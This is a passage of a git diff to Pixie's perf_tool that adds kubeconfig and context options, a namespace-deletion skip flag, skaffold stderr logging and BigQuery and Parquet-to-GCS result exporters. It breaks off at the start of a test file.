copy(dAtA[i:], m.KubeconfigPath) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.KubeconfigPath))) + i-- + dAtA[i] = 0x3a + } if len(m.MetricNames) > 0 { for k := range m.MetricNames { v := 
m.MetricNames[k] @@ -4648,6 +4732,9 @@ func (m *PrerenderedDeploy) Size() (n int) { n += 1 + l + sovExperiment(uint64(l)) } } + if m.SkipNamespaceDelete { + n += 2 + } return n } @@ -4917,6 +5004,18 @@ func (m *PrometheusScrapeSpec) Size() (n int) { n += mapEntrySize + 1 + sovExperiment(uint64(mapEntrySize)) } } + l = len(m.KubeconfigPath) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } + l = len(m.KubeContext) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } + l = len(m.Name) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } return n } @@ -5169,6 +5268,7 @@ func (this *PrerenderedDeploy) String() string { s := strings.Join([]string{`&PrerenderedDeploy{`, `YAMLPaths:` + fmt.Sprintf("%v", this.YAMLPaths) + `,`, `Patches:` + repeatedStringForPatches + `,`, + `SkipNamespaceDelete:` + fmt.Sprintf("%v", this.SkipNamespaceDelete) + `,`, `}`, }, "") return s @@ -5359,6 +5459,9 @@ func (this *PrometheusScrapeSpec) String() string { `Port:` + fmt.Sprintf("%v", this.Port) + `,`, `ScrapePeriod:` + strings.Replace(fmt.Sprintf("%v", this.ScrapePeriod), "Duration", "types.Duration", 1) + `,`, `MetricNames:` + mapStringForMetricNames + `,`, + `KubeconfigPath:` + fmt.Sprintf("%v", this.KubeconfigPath) + `,`, + `KubeContext:` + fmt.Sprintf("%v", this.KubeContext) + `,`, + `Name:` + fmt.Sprintf("%v", this.Name) + `,`, `}`, }, "") return s @@ -6849,6 +6952,26 @@ func (m *PrerenderedDeploy) Unmarshal(dAtA []byte) error { return err } iNdEx = postIndex + case 3: + if wireType != 0 { + return fmt.Errorf("proto: wrong wireType = %d for field SkipNamespaceDelete", wireType) + } + var v int + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + v |= int(b&0x7F) << shift + if b < 0x80 { + break + } + } + m.SkipNamespaceDelete = bool(v != 0) default: iNdEx = preIndex skippy, err := skipExperiment(dAtA[iNdEx:]) @@ -8569,6 +8692,102 @@ func (m *PrometheusScrapeSpec) Unmarshal(dAtA []byte) error { } m.MetricNames[mapkey] = mapvalue iNdEx = postIndex + case 7: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field KubeconfigPath", wireType) + } + var stringLen uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLen |= uint64(b&0x7F) << shift + if b < 0x80 { + break + } + } + intStringLen := int(stringLen) + if intStringLen < 0 { + return ErrInvalidLengthExperiment + } + postIndex := iNdEx + intStringLen + if postIndex < 0 { + return ErrInvalidLengthExperiment + } + if postIndex > l { + return io.ErrUnexpectedEOF + } + m.KubeconfigPath = string(dAtA[iNdEx:postIndex]) + iNdEx = postIndex + case 8: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field KubeContext", wireType) + } + var stringLen uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLen |= uint64(b&0x7F) << shift + if b < 0x80 { + break + } + } + intStringLen := int(stringLen) + if intStringLen < 0 { + return ErrInvalidLengthExperiment + } + postIndex := iNdEx + intStringLen + if postIndex < 0 { + return ErrInvalidLengthExperiment + } + if postIndex > l { + return io.ErrUnexpectedEOF + } + m.KubeContext = string(dAtA[iNdEx:postIndex]) + iNdEx = postIndex + case 9: + if wireType != 2 { + return 
fmt.Errorf("proto: wrong wireType = %d for field Name", wireType) + } + var stringLen uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLen |= uint64(b&0x7F) << shift + if b < 0x80 { + break + } + } + intStringLen := int(stringLen) + if intStringLen < 0 { + return ErrInvalidLengthExperiment + } + postIndex := iNdEx + intStringLen + if postIndex < 0 { + return ErrInvalidLengthExperiment + } + if postIndex > l { + return io.ErrUnexpectedEOF + } + m.Name = string(dAtA[iNdEx:postIndex]) + iNdEx = postIndex default: iNdEx = preIndex skippy, err := skipExperiment(dAtA[iNdEx:]) diff --git a/src/e2e_test/perf_tool/experimentpb/experiment.proto b/src/e2e_test/perf_tool/experimentpb/experiment.proto index d5482d5d249..ed9dce28339 100644 --- a/src/e2e_test/perf_tool/experimentpb/experiment.proto +++ b/src/e2e_test/perf_tool/experimentpb/experiment.proto @@ -124,6 +124,11 @@ message PatchTarget { message PrerenderedDeploy { repeated string yaml_paths = 1 [ (gogoproto.customname) = "YAMLPaths" ]; repeated PatchSpec patches = 2; + // If true, the step will not return the deployed namespace in its cleanup list, + // so workload.Close() will not delete that namespace on teardown. Use this for + // resources applied into namespaces the experiment does not own (e.g. a + // RoleBinding in kube-system that has to live there for API aggregation auth). + bool skip_namespace_delete = 3; } // SkaffoldDeploy specifies how to use skaffold to deploy a component. SkaffoldDeploy is currently @@ -220,6 +225,15 @@ message PrometheusScrapeSpec { // How often to scrape the matched pods. google.protobuf.Duration scrape_period = 5; map metric_names = 6; + // Optional path to a kubeconfig file for connecting to a different cluster. + // If empty, the experiment's default cluster context is used. + string kubeconfig_path = 7; + // Optional kubectl context name to use within the kubeconfig. + // If empty, the current-context from the kubeconfig is used. + string kube_context = 8; + // Identifier for this prometheus recorder, used by the CLI to target + // recorders with kubeconfig/kube_context overrides at runtime. + string name = 9; } // ClusterSpec specifies the type and size of cluster an experiment should run on. diff --git a/src/e2e_test/perf_tool/pkg/cluster/context.go b/src/e2e_test/perf_tool/pkg/cluster/context.go index bd79bf433f3..c274a6726b0 100644 --- a/src/e2e_test/perf_tool/pkg/cluster/context.go +++ b/src/e2e_test/perf_tool/pkg/cluster/context.go @@ -53,6 +53,36 @@ func NewContextFromPath(kubeconfigPath string) (*Context, error) { }, nil } +// NewContextFromOptions creates a new Context using the specified kubeconfig path and/or context name. +// If kubeconfigPath is empty, the default kubeconfig path is used. +// If kubeContext is empty, the current-context from the kubeconfig is used. 
+func NewContextFromOptions(kubeconfigPath string, kubeContext string) (*Context, error) { + loadingRules := &clientcmd.ClientConfigLoadingRules{} + if kubeconfigPath != "" { + loadingRules.ExplicitPath = kubeconfigPath + } else { + loadingRules = clientcmd.NewDefaultClientConfigLoadingRules() + } + overrides := &clientcmd.ConfigOverrides{} + if kubeContext != "" { + overrides.CurrentContext = kubeContext + } + config := clientcmd.NewNonInteractiveDeferredLoadingClientConfig(loadingRules, overrides) + restConfig, err := config.ClientConfig() + if err != nil { + return nil, err + } + if kubeconfigPath == "" { + kubeconfigPath = clientcmd.RecommendedHomeFile + } + clientset := k8s.GetClientset(restConfig) + return &Context{ + configPath: kubeconfigPath, + restConfig: restConfig, + clientset: clientset, + }, nil +} + // NewContextFromConfig writes the given kubeconfig to a file, and the returns NewContextFromPath for that file. func NewContextFromConfig(kubeconfig []byte) (*Context, error) { tmpFile, err := os.CreateTemp("", "*") diff --git a/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel b/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel index 22c706e9bee..a4205b00b8c 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel @@ -34,6 +34,7 @@ go_library( "//src/e2e_test/perf_tool/pkg/pixie", "@com_github_cenkalti_backoff_v4//:backoff", "@com_github_sirupsen_logrus//:logrus", + "@io_k8s_api//core/v1:core", "@io_k8s_apimachinery//pkg/apis/meta/v1:meta", ], ) diff --git a/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go b/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go index fda494dc839..08363f43abe 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go +++ b/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go @@ -25,6 +25,7 @@ import ( "github.com/cenkalti/backoff/v4" log "github.com/sirupsen/logrus" + v1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" @@ -68,6 +69,15 @@ func (hc *k8sHealthCheck) Wait(ctx context.Context, clusterCtx *cluster.Context, ) } for _, pod := range pl.Items { + // CronJob pods that exited 0 stay around in phase Succeeded + // (Kubernetes keeps them per successfulJobsHistoryLimit) and + // their containers report Ready: false forever. They are + // "done", not "not ready" — skip. Phase Failed is intentionally + // NOT skipped: a failed CronJob run is a real signal we want + // the healthcheck to surface, not paper over. 
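+		// In `kubectl get pods` these pods show STATUS "Completed"; without this
+		// skip, the healthcheck would keep retrying on them until its backoff
+		// expired.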
+ if pod.Status.Phase == v1.PodSucceeded { + continue + } for _, cs := range pod.Status.InitContainerStatuses { if cs.State.Terminated == nil { return fmt.Errorf( diff --git a/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go b/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go index a05960b6de2..ca7dbf6ef3e 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go +++ b/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go @@ -75,6 +75,9 @@ func (p *prerenderedDeployImpl) Deploy(clusterCtx *cluster.Context) ([]string, e if err := p.r.deploy(clusterCtx); err != nil { return nil, err } + if p.spec.SkipNamespaceDelete { + return nil, nil + } ns, err := p.r.getNamespace() if err != nil { return nil, err diff --git a/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go b/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go index edbac73a2ef..3216d73d009 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go +++ b/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go @@ -21,6 +21,7 @@ package steps import ( "bytes" "fmt" + "io" "os" "os/exec" "strings" @@ -34,6 +35,7 @@ import ( type skaffoldDeployImpl struct { spec *experimentpb.SkaffoldDeploy containerRegistryRepo string + stderrFile string r *renderedYAML } @@ -41,10 +43,13 @@ type skaffoldDeployImpl struct { var _ DeployStep = &skaffoldDeployImpl{} // NewSkaffoldDeploy returns a new DeployStep which deploys a stage of a workload using skaffold. -func NewSkaffoldDeploy(spec *experimentpb.SkaffoldDeploy, containerRegistryRepo string) DeployStep { +// If stderrFile is non-empty, skaffold's stderr is appended to that file in addition to +// the perf_tool process's stderr. +func NewSkaffoldDeploy(spec *experimentpb.SkaffoldDeploy, containerRegistryRepo, stderrFile string) DeployStep { return &skaffoldDeployImpl{ spec: spec, containerRegistryRepo: containerRegistryRepo, + stderrFile: stderrFile, } } @@ -85,6 +90,21 @@ func (s *skaffoldDeployImpl) Deploy(clusterCtx *cluster.Context) ([]string, erro return []string{ns}, nil } +// stderrSink returns the io.Writer to use for skaffold's stderr and a cleanup +// func. When stderrFile is set, output is teed to both os.Stderr and the file +// (opened in append mode so multiple skaffold invocations all land in the same +// log). +func (s *skaffoldDeployImpl) stderrSink() (io.Writer, func(), error) { + if s.stderrFile == "" { + return os.Stderr, func() {}, nil + } + f, err := os.OpenFile(s.stderrFile, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return nil, nil, fmt.Errorf("failed to open skaffold stderr file %q: %w", s.stderrFile, err) + } + return io.MultiWriter(os.Stderr, f), func() { f.Close() }, nil +} + func (s *skaffoldDeployImpl) runSkaffoldBuild() ([]byte, error) { var buildArtifacts bytes.Buffer buildArgs := []string{ @@ -95,8 +115,13 @@ func (s *skaffoldDeployImpl) runSkaffoldBuild() ([]byte, error) { } buildArgs = append(buildArgs, s.spec.SkaffoldArgs...) log.Tracef("Running `skaffold %s` ...", strings.Join(buildArgs, " ")) + stderr, cleanup, err := s.stderrSink() + if err != nil { + return nil, err + } + defer cleanup() cmd := exec.Command("skaffold", buildArgs...) - cmd.Stderr = os.Stderr + cmd.Stderr = stderr cmd.Stdout = &buildArtifacts if err := cmd.Run(); err != nil { return nil, fmt.Errorf("failed to run `skaffold %s`: %w", strings.Join(buildArgs, " "), err) @@ -114,9 +139,14 @@ func (s *skaffoldDeployImpl) runSkaffoldRender(buildArtifacts []byte) ([]byte, e } renderArgs = append(renderArgs, s.spec.SkaffoldArgs...) 
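+	// As in runSkaffoldBuild above, skaffold's stderr is teed through stderrSink
+	// so a CI run can upload the complete skaffold log as a single artifact.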
log.Tracef("Running `skaffold %s` ...", strings.Join(renderArgs, " ")) + stderr, cleanup, err := s.stderrSink() + if err != nil { + return nil, err + } + defer cleanup() cmd := exec.Command("skaffold", renderArgs...) cmd.Stdin = bytes.NewReader(buildArtifacts) - cmd.Stderr = os.Stderr + cmd.Stderr = stderr cmd.Stdout = &renderedYAMLs if err := cmd.Run(); err != nil { return nil, fmt.Errorf("failed to run `skaffold %s`: %w", strings.Join(renderArgs, " "), err) diff --git a/src/e2e_test/perf_tool/pkg/deploy/workload.go b/src/e2e_test/perf_tool/pkg/deploy/workload.go index ef1e1fc8170..9b09d28c619 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/workload.go +++ b/src/e2e_test/perf_tool/pkg/deploy/workload.go @@ -54,14 +54,17 @@ type workloadImpl struct { } // NewWorkload creates a new Workload capable of deploying according to the spec given. -func NewWorkload(pxCtx *pixie.Context, containerRegistryRepo string, spec *experimentpb.WorkloadSpec) (Workload, error) { +// skaffoldStderrFile, when non-empty, is the path to which skaffold's stderr is appended +// for any skaffold-based deploy steps; pass "" to leave skaffold's stderr going only to +// the perf_tool process's stderr. +func NewWorkload(pxCtx *pixie.Context, containerRegistryRepo, skaffoldStderrFile string, spec *experimentpb.WorkloadSpec) (Workload, error) { deploySteps := make([]steps.DeployStep, len(spec.DeploySteps)) for i, stepSpec := range spec.DeploySteps { switch stepSpec.DeployType.(type) { case *experimentpb.DeployStep_Prerendered: deploySteps[i] = steps.NewPrerenderedDeploy(stepSpec.GetPrerendered()) case *experimentpb.DeployStep_Skaffold: - deploySteps[i] = steps.NewSkaffoldDeploy(stepSpec.GetSkaffold(), containerRegistryRepo) + deploySteps[i] = steps.NewSkaffoldDeploy(stepSpec.GetSkaffold(), containerRegistryRepo, skaffoldStderrFile) case *experimentpb.DeployStep_Px: deploySteps[i] = steps.NewPxDeploy(pxCtx, stepSpec.GetPx()) } diff --git a/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel b/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel new file mode 100644 index 00000000000..17b1fe7c417 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel @@ -0,0 +1,50 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "exporter", + srcs = [ + "bq_exporter.go", + "exporter.go", + "parquet_exporter.go", + ], + importpath = "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter", + visibility = ["//visibility:public"], + deps = [ + "//src/e2e_test/perf_tool/pkg/metrics", + "//src/shared/bq", + "@com_github_gofrs_uuid//:uuid", + "@com_github_parquet_go_parquet_go//:parquet-go", + "@com_github_sirupsen_logrus//:logrus", + "@com_google_cloud_go_storage//:storage", + ], +) + +pl_go_test( + name = "exporter_test", + srcs = ["parquet_exporter_test.go"], + embed = [":exporter"], + deps = [ + "//src/e2e_test/perf_tool/pkg/metrics", + "@com_github_gofrs_uuid//:uuid", + "@com_github_parquet_go_parquet_go//:parquet-go", + "@com_github_stretchr_testify//assert", + "@com_github_stretchr_testify//require", + ], +) diff --git a/src/e2e_test/perf_tool/pkg/run/row.go b/src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go similarity index 58% rename from src/e2e_test/perf_tool/pkg/run/row.go rename to src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go index 17959d97d78..023db03c4f4 100644 --- a/src/e2e_test/perf_tool/pkg/run/row.go +++ b/src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go @@ -16,15 +16,18 @@ * SPDX-License-Identifier: Apache-2.0 */ -package run +package exporter import ( + "context" "encoding/json" "time" "github.com/gofrs/uuid" + log "github.com/sirupsen/logrus" "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" + "px.dev/pixie/src/shared/bq" ) // ResultRow represents a single datapoint for a single metric, to be stored in bigquery. @@ -51,7 +54,7 @@ type SpecRow struct { CommitTopoOrder int `bigquery:"commit_topo_order"` } -// MetricsRowToResultRow converts a `metrics.ResultRow` into a `bq.ResultRow`. +// MetricsRowToResultRow converts a `metrics.ResultRow` into a `ResultRow`. func MetricsRowToResultRow(expID uuid.UUID, row *metrics.ResultRow) (*ResultRow, error) { encodedTags, err := json.Marshal(row.Tags) if err != nil { @@ -65,3 +68,61 @@ func MetricsRowToResultRow(expID uuid.UUID, row *metrics.ResultRow) (*ResultRow, Tags: string(encodedTags), }, nil } + +// BQExporter exports experiment results and specs to BigQuery. +type BQExporter struct { + resultTable *bq.Table + specTable *bq.Table +} + +// NewBQExporter creates a new BigQuery exporter. +func NewBQExporter(resultTable, specTable *bq.Table) *BQExporter { + return &BQExporter{ + resultTable: resultTable, + specTable: specTable, + } +} + +// ExportResults consumes metrics from resultCh and inserts them into BigQuery in batches. +func (e *BQExporter) ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error { + bqCh := make(chan interface{}) + defer close(bqCh) + + inserter := &bq.BatchInserter{ + Table: e.resultTable, + BatchSize: 512, + PushTimeout: 2 * time.Minute, + } + go inserter.Run(bqCh) + + for row := range resultCh { + bqRow, err := MetricsRowToResultRow(expID, row) + if err != nil { + log.WithError(err).Error("Failed to convert result row") + continue + } + bqCh <- bqRow + } + return nil +} + +// ExportSpec writes the experiment spec to BigQuery on experiment success. 
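+// Unlike metric results, the spec is a single row, so a plain Inserter with a
+// bounded 5-minute Put is used rather than the batching path in ExportResults.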
+func (e *BQExporter) ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error { + specRow := &SpecRow{ + ExperimentID: expID.String(), + Spec: encodedSpec, + CommitTopoOrder: commitTopoOrder, + } + + inserter := e.specTable.Inserter() + inserter.SkipInvalidRows = false + + putCtx, cancel := context.WithTimeout(ctx, 5*time.Minute) + defer cancel() + return inserter.Put(putCtx, specRow) +} + +// Close is a no-op for the BigQuery exporter. +func (e *BQExporter) Close() error { + return nil +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/exporter.go b/src/e2e_test/perf_tool/pkg/exporter/exporter.go new file mode 100644 index 00000000000..c89d6898032 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/exporter.go @@ -0,0 +1,37 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + + "github.com/gofrs/uuid" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +// Exporter handles exporting experiment results and specs to a storage backend. +type Exporter interface { + // ExportResults consumes metrics from resultCh until it closes, then flushes. + ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error + // ExportSpec writes the experiment spec for a successful experiment. + ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error + // Close releases any resources held by the exporter. + Close() error +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go new file mode 100644 index 00000000000..c5fe259e93a --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go @@ -0,0 +1,285 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + "fmt" + "io" + "os" + "sort" + "time" + + "cloud.google.com/go/storage" + "github.com/gofrs/uuid" + "github.com/parquet-go/parquet-go" + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +type bufferedRow struct { + ExperimentID string + Timestamp time.Time + Name string + Value float64 + Tags map[string]string +} + +// uploadFunc is the signature for uploading a local file to a remote path. 
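+// Keeping the upload step behind this function type (set to uploadToGCS in the
+// constructor) lets tests and benchmarks swap in a local-copy or no-op
+// implementation without needing a real GCS client.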
+type uploadFunc func(ctx context.Context, objectPath string, localPath string) error + +// ParquetGCSExporter exports experiment results as parquet files to GCS. +type ParquetGCSExporter struct { + bucket string + prefix string + batchSize int + gcsClient *storage.Client + upload uploadFunc +} + +// NewParquetGCSExporter creates a new Parquet+GCS exporter. +func NewParquetGCSExporter(ctx context.Context, bucket, prefix string, batchSize int) (*ParquetGCSExporter, error) { + client, err := storage.NewClient(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create GCS client: %w", err) + } + e := &ParquetGCSExporter{ + bucket: bucket, + prefix: prefix, + batchSize: batchSize, + gcsClient: client, + } + e.upload = e.uploadToGCS + return e, nil +} + +// ExportResults consumes metrics from resultCh and writes them as batched parquet files to GCS. +func (e *ParquetGCSExporter) ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error { + now := time.Now() + basePath := e.gcsPath(now, expID) + seqNum := 0 + batch := make([]bufferedRow, 0, e.batchSize) + + for row := range resultCh { + batch = append(batch, bufferedRow{ + ExperimentID: expID.String(), + Timestamp: row.Timestamp, + Name: row.Name, + Value: row.Value, + Tags: row.Tags, + }) + if len(batch) >= e.batchSize { + if err := e.flushBatch(ctx, basePath, seqNum, batch); err != nil { + return err + } + seqNum++ + batch = batch[:0] + } + } + + if len(batch) > 0 { + if err := e.flushBatch(ctx, basePath, seqNum, batch); err != nil { + return err + } + } + return nil +} + +// ExportSpec writes the experiment spec as a parquet file to GCS. +func (e *ParquetGCSExporter) ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error { + type specRow struct { + ExperimentID string `parquet:"experiment_id"` + Spec string `parquet:"spec"` + CommitTopoOrder int64 `parquet:"commit_topo_order"` + } + + tmpFile, err := os.CreateTemp("", "spec-*.parquet") + if err != nil { + return fmt.Errorf("failed to create temp file for spec parquet: %w", err) + } + tmpPath := tmpFile.Name() + defer os.Remove(tmpPath) + + writer := parquet.NewGenericWriter[specRow](tmpFile) + _, err = writer.Write([]specRow{{ + ExperimentID: expID.String(), + Spec: encodedSpec, + CommitTopoOrder: int64(commitTopoOrder), + }}) + if err != nil { + tmpFile.Close() + return fmt.Errorf("failed to write spec parquet: %w", err) + } + if err := writer.Close(); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to close spec parquet writer: %w", err) + } + tmpFile.Close() + + now := time.Now() + gcsPath := fmt.Sprintf("%s/spec.parquet", e.gcsPath(now, expID)) + return e.upload(ctx, gcsPath, tmpPath) +} + +// Close releases resources held by the exporter. 
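+// Note: only exporters built via NewParquetGCSExporter hold a gcsClient; the
+// exporters constructed directly in tests never call Close.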
+func (e *ParquetGCSExporter) Close() error { + return e.gcsClient.Close() +} + +func (e *ParquetGCSExporter) gcsPath(t time.Time, expID uuid.UUID) string { + datePath := t.Format("2006/01/02") + if e.prefix != "" { + return fmt.Sprintf("%s/%s/%s", e.prefix, datePath, expID.String()) + } + return fmt.Sprintf("%s/%s", datePath, expID.String()) +} + +func (e *ParquetGCSExporter) flushBatch(ctx context.Context, basePath string, seqNum int, rows []bufferedRow) error { + tagKeys := collectTagKeys(rows) + schema := buildResultSchema(tagKeys) + + tmpFile, err := os.CreateTemp("", "results-*.parquet") + if err != nil { + return fmt.Errorf("failed to create temp file for parquet: %w", err) + } + tmpPath := tmpFile.Name() + defer os.Remove(tmpPath) + + writer := parquet.NewWriter(tmpFile, schema) + + for _, row := range rows { + parquetRow := buildResultRow(row, tagKeys) + if _, err := writer.WriteRows([]parquet.Row{parquetRow}); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to write parquet row: %w", err) + } + } + + if err := writer.Close(); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to close parquet writer: %w", err) + } + tmpFile.Close() + + gcsPath := fmt.Sprintf("%s/results_%04d.parquet", basePath, seqNum) + log.WithField("gcs_path", gcsPath).WithField("rows", len(rows)).Info("Uploading parquet batch") + return e.upload(ctx, gcsPath, tmpPath) +} + +func (e *ParquetGCSExporter) uploadToGCS(ctx context.Context, objectPath string, localPath string) error { + f, err := os.Open(localPath) + if err != nil { + return fmt.Errorf("failed to open temp file for upload: %w", err) + } + defer f.Close() + + obj := e.gcsClient.Bucket(e.bucket).Object(objectPath) + wc := obj.NewWriter(ctx) + if _, err := io.Copy(wc, f); err != nil { + wc.Close() + return fmt.Errorf("failed to upload to GCS: %w", err) + } + if err := wc.Close(); err != nil { + return fmt.Errorf("failed to finalize GCS upload: %w", err) + } + return nil +} + +// collectTagKeys returns a sorted list of unique tag keys across all rows. +func collectTagKeys(rows []bufferedRow) []string { + keySet := make(map[string]struct{}) + for _, row := range rows { + for k := range row.Tags { + keySet[k] = struct{}{} + } + } + keys := make([]string, 0, len(keySet)) + for k := range keySet { + keys = append(keys, k) + } + sort.Strings(keys) + return keys +} + +// buildResultSchema creates a parquet schema with fixed columns plus dynamic tag columns. +func buildResultSchema(tagKeys []string) *parquet.Schema { + group := parquet.Group{ + "experiment_id": parquet.String(), + "timestamp": parquet.Timestamp(parquet.Millisecond), + "name": parquet.String(), + "value": parquet.Leaf(parquet.DoubleType), + } + for _, key := range tagKeys { + group["tag_"+key] = parquet.Optional(parquet.String()) + } + return parquet.NewSchema("result", group) +} + +// buildResultRow constructs a parquet.Row from a bufferedRow with the given tag key ordering. +// Column ordering matches the schema's sorted field order (alphabetical by field name). +func buildResultRow(row bufferedRow, tagKeys []string) parquet.Row { + // parquet.Group sorts fields alphabetically. We must produce values in that order. + // Build named values, sort them, then assign column indices. 
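+	// For example, with tagKeys ["node_name", "pod"] the sorted order is:
+	// experiment_id(0), name(1), tag_node_name(2), tag_pod(3), timestamp(4), value(5).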
+ + type colEntry struct { + name string + val parquet.Value + optional bool + } + + entries := []colEntry{ + {"experiment_id", parquet.ValueOf(row.ExperimentID), false}, + {"name", parquet.ValueOf(row.Name), false}, + {"timestamp", parquet.Int64Value(row.Timestamp.UnixMilli()), false}, + {"value", parquet.ValueOf(row.Value), false}, + } + + for _, key := range tagKeys { + colName := "tag_" + key + if v, ok := row.Tags[key]; ok { + entries = append(entries, colEntry{colName, parquet.ValueOf(v), true}) + } else { + // Null value for missing optional tag. + entries = append(entries, colEntry{colName, parquet.Value{}, true}) + } + } + + // Sort by column name to match schema field order. + sort.Slice(entries, func(i, j int) bool { + return entries[i].name < entries[j].name + }) + + parquetRow := make(parquet.Row, len(entries)) + for i, e := range entries { + if e.optional { + if e.val.IsNull() { + // Null optional: definitionLevel=0 + parquetRow[i] = parquet.Value{}.Level(0, 0, i) + } else { + // Present optional: definitionLevel=1 + parquetRow[i] = e.val.Level(0, 1, i) + } + } else { + // Required: definitionLevel=0 + parquetRow[i] = e.val.Level(0, 0, i) + } + } + return parquetRow +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go new file mode 100644 index 00000000000..e20816bfd5b --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go @@ -0,0 +1,500 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. 
